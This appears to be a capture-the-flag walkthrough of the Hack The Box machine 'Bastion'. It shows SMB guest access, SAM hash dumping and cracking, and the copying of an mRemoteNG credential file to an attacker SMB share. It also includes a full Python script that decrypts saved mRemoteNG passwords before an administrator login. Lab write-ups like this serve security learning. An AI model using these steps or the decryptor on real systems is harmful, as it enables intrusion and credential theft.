Bastion

$ nmap -p- -T4 -A 10.10.10.134
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-15 08:34 EDT
Nmap scan report for 10.10.10.134
Host is up (0.028s latency).
Not shown: 65522 closed ports
PORT      STATE SERVICE      VERSION
22/tcp    open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -27m31s, deviation: 1h09m14s, median: 12m26s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-07-15T14:47:56+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-15T12:47:53
|_  start_date: 2021-07-15T05:16:36
$ smbmap -H 10.10.10.134 -u df
[+] Guest session       IP: 10.10.10.134:445    Name: 10.10.10.134                                      
[/] Work[!] Unable to remove test directory at \\10.10.10.134\Backups\SVUGOZCMTY, please remove manually
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        Backups                                                 READ, WRITE
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
$ smbclient -N -L 10.10.10.134

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        Backups         Disk      
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
SMB1 disabled -- no workgroup available
$ smbclient -N \\\\10.10.10.134\\Backups
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Tue Apr 16 06:02:11 2019
  ..                                  D        0  Tue Apr 16 06:02:11 2019
  note.txt                           AR      116  Tue Apr 16 06:10:09 2019
  SDT65CB.tmp                         A        0  Fri Feb 22 07:43:08 2019
  WindowsImageBackup                 Dn        0  Fri Feb 22 07:44:02 2019

                7735807 blocks of size 4096. 2762667 blocks available
smb: \> get note.txt

Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
smb: \WindowsImageBackup\L4mpje-PC\> cd "Backup 2019-02-22 124351"
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> dir
  .                                  Dn        0  Fri Feb 22 07:45:32 2019
  ..                                 Dn        0  Fri Feb 22 07:45:32 2019
  9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd     An 37761024  Fri Feb 22 07:44:03 2019
  9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd     An 5418299392  Fri Feb 22 07:45:32 2019
$ sudo mount -t cifs //10.10.10.134/backups /mnt -o user=,password=
kali@kali:/mnt$ sudo mkdir vhd
kali@kali:/mnt$ sudo guestmount --add /mnt/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd
kali@kali:/mnt$
kali@kali:/mnt$ sudo su
root@kali:/mnt# cd vhd
root@kali:/mnt/vhd# ls
'$Recycle.Bin'   config.sys                pagefile.sys   ProgramData      Recovery                     Users
 autoexec.bat   'Documents and Settings'   PerfLogs      'Program Files'  'System Volume Information'   Windows
root@kali:/mnt/vhd/Windows/System32/config# samdump2 ./SYSTEM ./SAM 
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
# secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword 
(Unknown User):bureaulampje
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x32764bdcb45f472159af59f1dc287fd1920016a6
dpapi_userkey:0xd2e02883757da99914e3138496705b223e9d03dd
[*] Cleaning up... 
https://crackstation.net/
$ john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
                 (*disabled* Administrator)
bureaulampje     (L4mpje)
2g 0:00:00:00 DONE (2021-07-15 14:16) 3.389g/s 15924Kp/s 15924Kc/s 15932KC/s buresres..burdy1
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed
$ ssh L4mpje@10.10.10.134
l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt                                                                            
9bfe57d5c3309db3a151772f9d86c6cd                                                                                                
l4mpje@BASTION C:\Users\L4mpje\Desktop>     
mRemoteNG is a remote connection management tool that lets the user save passwords for various types of connections. Those saved credentials are stored in a file in the user's AppData directory, confCons.xml:
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>dir  
confCons.xml
Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="                      
Username="L4mpje" Domain="" Password="yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB"
kali@kali:~/0.htb/machines/Bastion134$ impacket-smbserver test ~/0.htb/machines/Bastion134
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>copy confCons.xml \\10.10.14.56\test\  
https://github.com/kmahyyg/mremoteng-decrypt/releases
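#!/usr/bin/env python3
"""Print the saved connection passwords from an mRemoteNG confCons.xml.

Usage: getpw.py confCons.xml

Every self-closing ``<Node .../>`` element carries a base64 ``Password``
attribute laid out as ``salt(16) | nonce(16) | ciphertext | GCM tag(16)``.
The AES key is derived with PBKDF2-HMAC-SHA1 (1000 rounds, 32-byte key) from
the master password; this script uses the built-in default ``mR3m``.  If the
file was protected with a different master password the GCM tag check fails
and the node is reported on stderr instead of crashing the run.

Exit status: 0 when every node decrypted, 1 when at least one node could not
be read or decrypted, 2 on a usage error.
"""
import base64
import hashlib
import re
import sys
from Cryptodome.Cipher import AES

# Key-derivation inputs and blob layout used by mRemoteNG (see module docstring).
MASTER_PASSWORD = b"mR3m"
KDF_ITERATIONS = 1000
KEY_LEN = 32
SALT_LEN = 16
NONCE_LEN = 16
TAG_LEN = 16


def _read_config(path: str) -> str:
    """Return the text of the config file at ``path``; exit with status 1 if unreadable.

    Catches OSError rather than only FileNotFoundError so permission errors and
    directories are reported the same way instead of producing a traceback.
    """
    try:
        with open(path, "r") as f:
            return f.read()
    except OSError:
        print(f"[-] Unable to open {path}", file=sys.stderr)
        sys.exit(1)


def _attr(node: str, name: str):
    """Return the value of attribute ``name`` inside one ``<Node .../>`` string, or None.

    Matches ``[^"]*`` so usernames containing dots, hyphens or spaces and empty
    values are handled; the original ``\\w*`` / ``[^ ]+`` patterns raised
    IndexError on those.
    """
    m = re.search(rf' {name}="([^"]*)"', node)
    return m.group(1) if m else None


def _decrypt_password(enc: bytes) -> str:
    """Return the plaintext for one base64-decoded ``Password`` blob.

    Raises ValueError when the blob is too short to contain salt, nonce and
    tag, or when GCM tag verification fails (different master password or
    corrupted data).
    """
    if len(enc) < SALT_LEN + NONCE_LEN + TAG_LEN:
        raise ValueError("password blob too short")
    salt = enc[:SALT_LEN]
    nonce = enc[SALT_LEN:SALT_LEN + NONCE_LEN]
    cipher = enc[SALT_LEN + NONCE_LEN:-TAG_LEN]
    tag = enc[-TAG_LEN:]
    key = hashlib.pbkdf2_hmac("sha1", MASTER_PASSWORD, salt, KDF_ITERATIONS, dklen=KEY_LEN)
    aes = AES.new(key, AES.MODE_GCM, nonce=nonce)
    # The salt is bound into the tag as associated data; it is not encrypted.
    aes.update(salt)
    return aes.decrypt_and_verify(cipher, tag).decode()


def main(argv: list) -> int:
    """Entry point: decrypt every node in ``argv[1]`` and print user/password pairs.

    Diagnostics go to stderr so the decrypted output on stdout can be redirected
    cleanly.  Returns the process exit status described in the module docstring.
    """
    if len(argv) != 2:
        print(f"[-] Usage: {argv[0]} [confCons.xml]", file=sys.stderr)
        return 2
    conf = _read_config(argv[1])

    mode = re.findall(r'BlockCipherMode="(\w+)"', conf)
    if len(mode) != 1:
        print("[-] Warning - No BlockCipherMode detected", file=sys.stderr)
    elif mode[0] != "GCM":
        # Print the mode itself rather than the one-element list it came from.
        print(f"[-] Warning - This script is for AES GCM Mode. {mode[0]} detected", file=sys.stderr)

    # [^>]* instead of greedy .+ so several nodes on one line are not merged.
    nodes = re.findall(r"<Node [^>]*/>", conf)
    if nodes:
        print(f"[+] Found nodes: {len(nodes)}\n")
    else:
        print("[-] Found no nodes", file=sys.stderr)

    failures = 0
    for node in nodes:
        user = _attr(node, "Username")
        pw_b64 = _attr(node, "Password")
        if pw_b64 is None:
            print(f"[-] {user}: node has no Password attribute", file=sys.stderr)
            failures += 1
            continue
        try:
            # binascii.Error from b64decode is a ValueError subclass, so one
            # handler covers bad base64, short blobs and failed tag checks.
            password = _decrypt_password(base64.b64decode(pw_b64))
        except ValueError as e:
            print(f"[-] {user}: unable to decrypt password ({e})", file=sys.stderr)
            failures += 1
            continue
        print(f"Username: {user}\nPassword: {password}\n")
    return 1 if failures else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))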
$ python3 getpw.py confCons.xml 
[+] Found nodes: 2

Username: Administrator
Password: thXLHM96BeKL0ER2

Username: L4mpje
Password: bureaulampje

kali@kali:~/0.htb/machines/Bastion134$ 
kali@kali:~/0.htb/machines/Bastion134$ ssh administrator@10.10.10.134
administrator@10.10.10.134's password: 
Microsoft Windows [Version 10.0.14393]                                                                                          
(c) 2016 Microsoft Corporation. All rights reserved.   
administrator@BASTION C:\Users\Administrator>type Desktop\root.txt                                                                                    
958850b91811676ed6620a9c430e65c8                                                                                                                      
administrator@BASTION C:\Users\Administrator>          
